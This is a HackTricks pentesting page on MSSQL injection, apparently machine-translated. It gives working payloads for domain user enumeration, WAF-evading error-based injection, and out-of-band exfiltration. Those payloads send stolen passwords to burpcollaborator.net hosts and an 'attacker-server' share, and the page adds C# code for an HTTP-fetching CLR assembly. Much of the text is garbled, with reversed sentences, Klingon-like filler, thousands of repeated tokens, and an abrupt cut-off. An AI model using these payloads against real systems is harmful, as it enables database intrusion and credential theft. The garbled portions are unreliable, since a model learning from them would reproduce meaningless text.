hacktricks/pentesting-web/sql-injection/mssql-injection.md

MSSQL Injection

htARTE (HackTricks AWS Red Team Expert) !HackTricks!

Other ways to support HackTricks:

• If you want to see your company advertised in HackTricks or download HackTricks in PDF Check the SUBSCRIPTION PLANS!
• Get the official PEASS & HackTricks swag
• Discover The PEASS Family, our collection of exclusive NFTs
• Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @carlospolopm.
• Share your hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.

Active Directory enumeration

It may be possible to enumerate domain users via SQL injection inside a MSSQL server using the following MSSQL functions:

• SELECT DEFAULT_DOMAIN(): Get current domain name.
• master.dbo.fn_varbintohexstr(SUSER_SID('DOMAIN\Administrator')): If you know the name of the domain (DOMAIN in this example) this function will return the SID of the user Administrator in hex format. This will look like 0x01050000000[...]0000f401, note how the last 4 bytes are the number 500 in big endian format, which is the common ID of the user administrator.
  This function will allow you to know the ID of the domain (all the bytes except of the last 4).
• SUSER_SNAME(0x01050000000[...]0000e803) : This function will return the username of the ID indicated (if any), in this case 0000e803 in big endian == 1000 (usually this is the ID of the first regular user ID created). Then you can imagine that you can brute-force user IDs from 1000 to 2000 and probably get all the usernames of the users of the domain. For example using a function like the following one:

def get_sid(n):
domain = '0x0105000000000005150000001c00d1bcd181f1492bdfc236'
user = struct.pack('<I', int(n))
user = user.hex()
return f"{domain}{user}" #if n=1000, get SID of the user with ID 1000

Alternative Error-Based vectors

Error-based SQL injections typically resemble constructions such as +AND+1=@@version-- and variants based on the «OR» operator. Queries containing such expressions are usually blocked by WAFs. As a bypass, concatenate a string using the %2b character with the result of specific function calls that trigger a data type conversion error on sought-after data.

Some examples of such functions:

• SUSER_NAME()
• USER_NAME()
• PERMISSIONS()
• DB_NAME()
• FILE_NAME()
• TYPE_NAME()
• COL_NAME()

Example use of function USER_NAME():

USER_NAME() ʔuʔ

https://vuln.app/getItem?id=1'%2buser_name(@@version)--

SSRF

SSRF tricks were taken from here

fn_xe_file_target_read_file

'ej VIEW SERVER STATE permission on the server tlhIngan vItlhutlh.

https://vuln.app/getItem?id= 1+and+exists(select+*+from+fn_xe_file_target_read_file('C:\*.xel','\\'%2b(select+pass+from+users+where+id=1)%2b'.064edw6l0h153w39ricodvyzuq0ood.burpcollaborator.net\1.xem',null,null))

# Check if you have it
SELECT * FROM fn_my_permissions(NULL, 'SERVER') WHERE permission_name='VIEW SERVER STATE';
# Or doing
Use master;
EXEC sp_helprotect 'fn_xe_file_target_read_file';

fn_get_audit_file

CONTROL SERVER permission is required.

https://vuln.app/getItem?id= 1%2b(select+1+where+exists(select+*+from+fn_get_audit_file('\\'%2b(select+pass+from+users+where+id=1)%2b'.x53bct5ize022t26qfblcsxwtnzhn6.burpcollaborator.net\',default,default)))

# Check if you have it
SELECT * FROM fn_my_permissions(NULL, 'SERVER') WHERE permission_name='CONTROL SERVER';
# Or doing
Use master;
EXEC sp_helprotect 'fn_get_audit_file';

fn_trace_gettabe

CONTROL SERVER permission vItlhutlh.

https://vuln.app/ getItem?id=1+and+exists(select+*+from+fn_trace_gettable('\\'%2b(select+pass+from+users+where+id=1)%2b'.ng71njg8a4bsdjdw15mbni8m4da6yv.burpcollaborator.net\1.trc',default))

# Check if you have it
SELECT * FROM fn_my_permissions(NULL, 'SERVER') WHERE permission_name='CONTROL SERVER';
# Or doing
Use master;
EXEC sp_helprotect 'fn_trace_gettabe';

xp_dirtree, xp_fileexists, xp_subdirs

Stored procedures like xp_dirtree, though not officially documented by Microsoft, have been described by others online due to their utility in network operations within MSSQL. These procedures are often used in Out of Band Data exfiltration, as showcased in various examples and posts.

The xp_dirtree stored procedure, for instance, is used to make network requests, but it's limited to only TCP port 445. The port number isn't modifiable, but it allows reading from network shares. The usage is demonstrated in the SQL script below:

xp_dirtree, xp_fileexists, xp_subdirs

Stored procedures like xp_dirtree, though not officially documented by Microsoft, have been described by others online due to their utility in network operations within MSSQL. These procedures are often used in Out of Band Data exfiltration, as showcased in various examples and posts.

The xp_dirtree stored procedure, for instance, is used to make network requests, but it's limited to only TCP port 445. The port number isn't modifiable, but it allows reading from network shares. The usage is demonstrated in the SQL script below:

DECLARE @user varchar(100);
SELECT @user = (SELECT user);
EXEC ('master..xp_dirtree "\\' + @user + '.attacker-server\\aa"');

mssql-injection.md

---

xp_cmdshell

xp_cmdshell execute SSRF trigger something use could Also info read relevant section page:

{% content-ref url="../../network-services-pentesting/pentesting-mssql-microsoft-sql-server/" %} pentesting-mssql-microsoft-sql-server {% endcontent-ref %}

MSSQL User Defined Function - SQLHttp

CLR UDF (Common Language Runtime User Defined Function) Creating, authored code DLL compiled, language .NET any in, loaded be MSSQL within functions custom executing, requires process is access dbo. means usually feasible only role Administrator an with or sa as connection database the when only usually is.

instructions installation and repository Github this in provided are project Studio Visual A MSSQL into binary the of loading the facilitate to DLL a as assembly CLR a as MSSQL into binary the of loading the facilitate to repository Github this in provided are instructions installation.

illustrated below as content retrieve and request GET a execute to class WebClient the employs file cs http the in encapsulated is functionality this of core The MSSQL within requests GET of execution the enabling thereby assembly CLR a as MSSQL into binary the of loading the facilitate to repository Github this in provided are instructions installation.

---

using System.Data.SqlTypes;
using System.Net;

public partial class UserDefinedFunctions
{
[Microsoft.SqlServer.Server.SqlFunction]
public static SqlString http(SqlString url)
{
var wc = new WebClient();
var html = wc.DownloadString(url.Value);
return new SqlString(html);
}
}

tlhIngan Hol Translation:

CREATE ASSEMBLY SQL command vItlhutlhlaHchugh, CREATE ASSEMBLY SQL command vItlhutlhlaHchugh, CREATE ASSEMBLY SQL command vItlhutlhlaHchugh, CREATE ASSEMBLY SQL command vItlhutlhlaHchugh, CREATE ASSEMBLY SQL command vItlhutlhlaHchugh, CREATE ASSEMBLY SQL command vItlhutlhlaHchugh, CREATE ASSEMBLY SQL command vItlhutlhlaHchugh, CREATE ASSEMBLY SQL command vItlhutlhlaHchugh, CREATE ASSEMBLY SQL command vItlhutlhlaHchugh, CREATE ASSEMBLY SQL command vItlhutlhlaHchugh, CREATE ASSEMBLY SQL command vItlhutlhlaHchugh, CREATE ASSEMBLY SQL command vItlhutlhlaHchugh, CREATE ASSEMBLY SQL command vItlhutlhlaHchugh, CREATE ASSEMBLY SQL command vItlhutlhlaHchugh, CREATE ASSEMBLY SQL command vItlhutlhlaHchugh, CREATE ASSEMBLY SQL command vItlhutlhlaHchugh, CREATE ASSEMBLY SQL command vItlhutlhlaHchugh, CREATE ASSEMBLY SQL command vItlhutlhlaHchugh, CREATE ASSEMBLY SQL command vItlhutlhlaHchugh, CREATE ASSEMBLY SQL command vItlhutlhlaHchugh, CREATE ASSEMBLY SQL command vItlhutlhlaHchugh, CREATE ASSEMBLY SQL command vItlhutlhlaHchugh, CREATE ASSEMBLY SQL command vItlhutlhlaHchugh, CREATE ASSEMBLY SQL command vItlhutlhlaHchugh, CREATE ASSEMBLY SQL command vItlhutlhlaHchugh, CREATE ASSEMBLY SQL command vItlhutlhlaHchugh, CREATE ASSEMBLY SQL command vItlhutlhlaHchugh, CREATE ASSEMBLY SQL command vItlhutlhlaHchugh, CREATE ASSEMBLY SQL command vItlhutlhlaHchugh, CREATE ASSEMBLY SQL command vItlhutlhlaHchugh, CREATE ASSEMBLY SQL command vItlhutlhlaHchugh, CREATE ASSEMBLY SQL command vItlhutlhlaHchugh, CREATE ASSEMBLY SQL command vItlhutlhlaHchugh, CREATE ASSEMBLY SQL command vItlhutlhlaHchugh, CREATE ASSEMBLY SQL command vItlhutlhlaHchugh, CREATE ASSEMBLY SQL command vItlhutlhlaHchugh, CREATE ASSEMBLY SQL command vItlhutlhlaHchugh, CREATE ASSEMBLY SQL command vItlhutlhlaHchugh, CREATE ASSEMBLY SQL command vItlhutlhlaHchugh, CREATE ASSEMBLY SQL command vItlhutlhlaHchugh, CREATE ASSEMBLY SQL command vItlhutlhlaHchugh, CREATE ASSEMBLY SQL command vItlhutlhlaHchugh, CREATE ASSEMBLY SQL command vItlhutlhlaHchugh, CREATE ASSEMBLY SQL command vItlhutlhlaHchugh, CREATE ASSEMBLY SQL command vItlhutlhlaHchugh, CREATE ASSEMBLY SQL command vItlhutlhlaHchugh, CREATE ASSEMBLY SQL command vItlhutlhlaHchugh, CREATE ASSEMBLY SQL command vItlhutlhlaHchugh, CREATE ASSEMBLY SQL command vItlhutlhlaHchugh, CREATE ASSEMBLY SQL command vItlhutlhlaHchugh, CREATE ASSEMBLY SQL command vItlhutlhlaHchugh, CREATE ASSEMBLY SQL command vItlhutlhlaHchugh, CREATE ASSEMBLY SQL command vItlhutlhlaHchugh, CREATE ASSEMBLY SQL command vItlhutlhlaHchugh, CREATE ASSEMBLY SQL command vItlhutlhlaHchugh, CREATE ASSEMBLY SQL command vItlhutlhlaHchugh, CREATE ASSEMBLY SQL command vItlhutlhlaHchugh, CREATE ASSEMBLY SQL command vItlhutlhlaHchugh, CREATE ASSEMBLY SQL command vItlhutlhlaHchugh, CREATE ASSEMBLY SQL command vItlhutlhlaHchugh, CREATE ASSEMBLY SQL command vItlhutlhlaHchugh, CREATE ASSEMBLY SQL command vItlhutlhlaHchugh, CREATE ASSEMBLY SQL command vItlhutlhlaHchugh, CREATE ASSEMBLY SQL command vItlhutlhlaHchugh, CREATE ASSEMBLY SQL command vItlhutlhlaHchugh, CREATE ASSEMBLY SQL command vItlhutlhlaHchugh, CREATE ASSEMBLY SQL command vItlhutlhlaHchugh, CREATE ASSEMBLY SQL command vItlhutlhlaHchugh, CREATE ASSEMBLY SQL command vItlhutlhlaHchugh, CREATE ASSEMBLY SQL command vItlhutlhlaHchugh, CREATE ASSEMBLY SQL command vItlhutlhlaHchugh, CREATE ASSEMBLY SQL command vItlhutlhlaHchugh, CREATE ASSEMBLY SQL command vItlhutlhlaHchugh, CREATE ASSEMBLY SQL command vItlhutlhlaHchugh, CREATE ASSEMBLY SQL command vItlhutlhlaHchugh, CREATE ASSEMBLY SQL command vItlhutlhlaHchugh, CREATE ASSEMBLY SQL command vItlhutlhlaHchugh, CREATE ASSEMBLY SQL command vItlhutlhlaHchugh, CREATE ASSEMBLY SQL command vItlhutlhlaHchugh, CREATE ASSEMBLY SQL command vItlhutlhlaHchugh, CREATE ASSEMBLY SQL command vItlhutlhlaHchugh, CREATE ASSEMBLY SQL command vItlhutlhlaHchugh, CREATE ASSEMBLY SQL command vItlhutlhlaHchugh, CREATE ASSEMBLY SQL command vItlhutlhlaHchugh, CREATE ASSEMBLY SQL command vItlhutlhlaHchugh, CREATE ASSEMBLY SQL command vItlhutlhlaHchugh, CREATE ASSEMBLY SQL command vItlhutlhlaHchugh, CREATE ASSEMBLY SQL command vItlhutlhlaHchugh, CREATE ASSEMBLY SQL command vItlhutlhlaHchugh, CREATE ASSEMBLY SQL command vItlhutlhlaHchugh, CREATE ASSEMBLY SQL command vItlhutlhlaHchugh, CREATE ASSEMBLY SQL command vItlhutlhlaHchugh, CREATE ASSEMBLY SQL command vItlhutlhlaHchugh, CREATE ASSEMBLY SQL command vItlhutlhlaHchugh, CREATE ASSEMBLY SQL command vItlhutlhlaHchugh, CREATE ASSEMBLY SQL command vItlhutlhlaHchugh, CREATE ASSEMBLY SQL command vItlhutlhlaHchugh, CREATE ASSEMBLY SQL command vItlhutlhlaHchugh, CREATE ASSEMBLY SQL command vItlhutlhlaHchugh, CREATE ASSEMBLY SQL command vItlhutlhlaHchugh, CREATE ASSEMBLY SQL command vItlhutlhlaHchugh, CREATE ASSEMBLY SQL command vItlhutlhlaHchugh, CREATE ASSEMBLY SQL command vItlhutlhlaHchugh, CREATE ASSEMBLY SQL command vItlhutlhlaHchugh, CREATE ASSEMBLY SQL command vItlhutlhlaHchugh, CREATE ASSEMBLY SQL command vItlhutlhlaHchugh, CREATE ASSEMBLY SQL command vItlhutlhlaHchugh, CREATE ASSEMBLY SQL command vItlhutlhlaHchugh, CREATE ASSEMBLY SQL command vItlhutlhlaHchugh, CREATE ASSEMBLY SQL command vItlhutlhlaHchugh, CREATE ASSEMBLY SQL command vItlhutlhlaHchugh, CREATE ASSEMBLY SQL command vItlhutlhlaHchugh, CREATE ASSEMBLY SQL command vItlhutlhlaHchugh, CREATE ASSEMBLY SQL command vItlhutlhlaHchugh, CREATE ASSEMBLY SQL command vItlhutlhlaHchugh, CREATE ASSEMBLY SQL command vItlhutlhlaHchugh, CREATE ASSEMBLY SQL command vItlhutlhlaHchugh, CREATE ASSEMBLY SQL command vItlhutlhlaHchugh, CREATE ASSEMBLY SQL command vItlhutlhlaHchugh, CREATE ASSEMBLY SQL command vItlhutlhlaHchugh, CREATE ASSEMBLY SQL command vItlhutlhlaHchugh, CREATE ASSEMBLY SQL command vItlhutlhlaHchugh, CREATE ASSEMBLY SQL command vItlhutlhlaHchugh, CREATE ASSEMBLY SQL command vItlhutlhlaHchugh, CREATE ASSEMBLY SQL command vItlhutlhlaHchugh, CREATE ASSEMBLY SQL command vItlhutlhlaHchugh, CREATE ASSEMBLY SQL command vItlhutlhlaHchugh, CREATE ASSEMBLY SQL command vItlhutlhlaHchugh, CREATE ASSEMBLY SQL command vItlhutlhlaHchugh, CREATE ASSEMBLY SQL command vItlhutlhlaHchugh, CREATE ASSEMBLY SQL command vItlhutlhlaHchugh, CREATE ASSEMBLY SQL command vItlhutlhlaHchugh, CREATE ASSEMBLY SQL command vItlhutlhlaHchugh, CREATE ASSEMBLY SQL command vItlhutlhlaHchugh, CREATE ASSEMBLY SQL command vItlhutlhlaHchugh, CREATE ASSEMBLY SQL command vItlhutlhlaHchugh, CREATE ASSEMBLY SQL command vItlhutlhlaHchugh, CREATE ASSEMBLY SQL command vItlhutlhlaHchugh, CREATE ASSEMBLY SQL command vItlhutlhlaHchugh, CREATE ASSEMBLY SQL command vItlhutlhlaHchugh, CREATE ASSEMBLY SQL command vItlhutlhlaHchugh, CREATE ASSEMBLY SQL command vItlhutlhlaHchugh, CREATE ASSEMBLY SQL command vItlhutlhlaHchugh, CREATE ASSEMBLY SQL command vItlhutlhlaHchugh, CREATE ASSEMBLY SQL command vItlhutlhlaHchugh, CREATE ASSEMBLY SQL command vItlhutlhlaHchugh, CREATE ASSEMBLY SQL command vItlhutlhlaHchugh, CREATE ASSEMBLY SQL command vItlhutlhlaHchugh, CREATE ASSEMBLY SQL command vItlhutlhlaHchugh, CREATE ASSEMBLY SQL command vItlhutlhlaHchugh, CREATE ASSEMBLY SQL command vItlhutlhlaHchugh, CREATE ASSEMBLY SQL command vItlhutlhlaHchugh, CREATE ASSEMBLY SQL command vItlhutlhlaHchugh, CREATE ASSEMBLY SQL command vItlhutlhlaHchugh, CREATE ASSEMBLY SQL command vItlhutlhlaHchugh, CREATE ASSEMBLY SQL command vItlhutlhlaHchugh, CREATE ASSEMBLY SQL command vItlhutlhlaHchugh, CREATE ASSEMBLY SQL command vItlhutlhlaHchugh, CREATE ASSEMBLY SQL command vItlhutlhlaHchugh, CREATE ASSEMBLY SQL command vItlhutlhlaHchugh, CREATE ASSEMBLY SQL command vItlhutlhlaHchugh, CREATE ASSEMBLY SQL command vItlhutlhlaHchugh, CREATE ASSEMBLY SQL command vItlhutlhlaHchugh, CREATE ASSEMBLY SQL command vItlhutlhlaHchugh, CREATE ASSEMBLY SQL command vItlhutlhlaHchugh, CREATE ASSEMBLY SQL command vItlhutlhlaHchugh, CREATE ASSEMBLY SQL command vItlhutlhlaHchugh, CREATE ASSEMBLY SQL command vItlhutlhlaHchugh, CREATE ASSEMBLY SQL command vItlhutlhlaHchugh, CREATE ASSEMBLY SQL command vItlhutlhlaHchugh, CREATE ASSEMBLY SQL command vItlhutlhlaHchugh, CREATE ASSEMBLY SQL command vItlhutlhlaHchugh, CREATE ASSEMBLY SQL command vItlhutlhlaHchugh, CREATE ASSEMBLY SQL command vItlhutlhlaHchugh, CREATE ASSEMBLY SQL command vItlhutlhlaHchugh, CREATE ASSEMBLY SQL command vItlhutlhlaHchugh, CREATE ASSEMBLY SQL command vItlhutlhlaHchugh, CREATE ASSEMBLY SQL command vItlhutlhlaHchugh, CREATE ASSEMBLY SQL command vItlhutlhlaHchugh, CREATE ASSEMBLY SQL command vItlhutlhlaHchugh, CREATE ASSEMBLY SQL command vItlhutlhlaHchugh, CREATE ASSEMBLY SQL command vItlhutlhlaHchugh, CREATE ASSEMBLY SQL command vItlhutlhlaHchugh, CREATE ASSEMBLY SQL command vItlhutlhlaHchugh, CREATE ASSEMBLY SQL command vItlhutlhlaHchugh, CREATE ASSEMBLY SQL command vItlhutlhlaHchugh, CREATE ASSEMBLY SQL command vItlhutlhlaHchugh, CREATE ASSEMBLY SQL command vItlhutlhlaHchugh, CREATE ASSEMBLY SQL command vItlhutlhlaHchugh, CREATE ASSEMBLY SQL command vItlhutlhlaHchugh, CREATE ASSEMBLY SQL command vItlhutlhlaHchugh, CREATE ASSEMBLY SQL command vItlhutlhlaHchugh, CREATE ASSEMBLY SQL command vItlhutlhlaHchugh, CREATE ASSEMBLY SQL command vItlhutlhlaHchugh, CREATE ASSEMBLY SQL command vItlhutlhlaHchugh, CREATE ASSEMBLY SQL command vItlhutlhlaHchugh, CREATE ASSEMBLY SQL command vItlhutlhlaHchugh, CREATE ASSEMBLY SQL command vItlhutlhlaHchugh, CREATE ASSEMBLY SQL command vItlhutlhlaHchugh, CREATE ASSEMBLY SQL command vItlhutlhlaHchugh, CREATE ASSEMBLY SQL command vItlhutlhlaHchugh, CREATE ASSEMBLY SQL command vItlhutlhlaHchugh, CREATE ASSEMBLY SQL command vItlhutlhlaHchugh, CREATE ASSEMBLY SQL command vItlhutlhlaHchugh, CREATE ASSEMBLY SQL command vItlhutlhlaHchugh, CREATE ASSEMBLY SQL command vItlhutlhlaHchugh, CREATE ASSEMBLY SQL command vItlhutlhlaHchugh, CREATE ASSEMBLY SQL command vItlhutlhlaHchugh, CREATE ASSEMBLY SQL command vItlhutlhlaHchugh, CREATE ASSEMBLY SQL command vItlhutlhlaHchugh, CREATE ASSEMBLY SQL command vItlhutlhlaHchugh, CREATE ASSEMBLY SQL command vItlhutlhlaHchugh, CREATE ASSEMBLY SQL command vItlhutlhlaHchugh, CREATE ASSEMBLY SQL command vItlhutlhlaHchugh, CREATE ASSEMBLY SQL command vItlhutlhlaHchugh, CREATE ASSEMBLY SQL

EXEC sp_add_trusted_assembly 0x35acf108139cdb825538daee61f8b6b07c29d03678a4f6b0a5dae41a2198cf64cefdb1346c38b537480eba426e5f892e8c8c13397d4066d4325bf587d09d0937,N'HttpDb, version=0.0.0.0, culture=neutral, publickeytoken=null, processorarchitecture=msil';

DaH jImejDaq vItlhutlh. vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlh

DECLARE @url varchar(max);
